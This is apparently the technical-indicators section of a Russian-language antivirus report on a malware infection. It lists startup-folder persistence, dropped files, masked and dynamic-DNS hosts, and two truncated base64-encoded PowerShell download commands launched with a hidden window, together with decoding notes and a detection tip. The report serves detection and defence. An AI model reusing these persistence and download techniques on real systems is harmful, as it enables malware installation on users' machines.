Техническая информация
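- %APPDATA%\microsoft\windows\start menu\programs\startup\aaa.vbs (папка автозагрузки пользователя: скрипт из неё выполняется при каждом входе в систему; запуск этого файла через wscript.exe приведён в списке ниже)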
- %HOMEPATH%\music\gzruler.exe
- %HOMEPATH%\music\win.vbs
- C:\trulerblogspot.txt
- http://www.ho####brasilia.com/
- DNS ASK ho####brasilia.com
- DNS ASK on####ve.live.com
- DNS ASK eq####.#m.files.1drv.com
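- DNS ASK 3l####rat.ddns.net (ddns.net — домен службы динамического DNS; IP-адрес за таким именем может меняться, поэтому для блокировки и поиска в журналах надёжнее использовать имя узла, а не адрес)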
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Music\win.vbs"
- '%HOMEPATH%\music\gzruler.exe'
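- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...' (со скрытым окном)
  Примечание: аргумент -enc содержит команду в кодировке Base64 (UTF-16LE). Видимая часть декодируется в `$web = New-Object System.Net.WebClient;` и начало строки `$string = $web.Downloadstr…` — по-видимому, это вызов DownloadString, то есть загрузка данных из сети. Остальная часть команды в отчёте обрезана, поэтому адрес загрузки и дальнейшие действия по этой строке установить нельзя.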
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\AAA.vbs"
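- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...
  Примечание: видимая часть аргумента -enc (Base64, UTF-16LE) декодируется в `$web = New-Object System.Net.WebClient;` и начало `$string = $web.Downloadstr…`; остальная часть команды в отчёте обрезана. Для обнаружения полезно отслеживать запуск powershell.exe с параметром -enc из процесса wscript.exe.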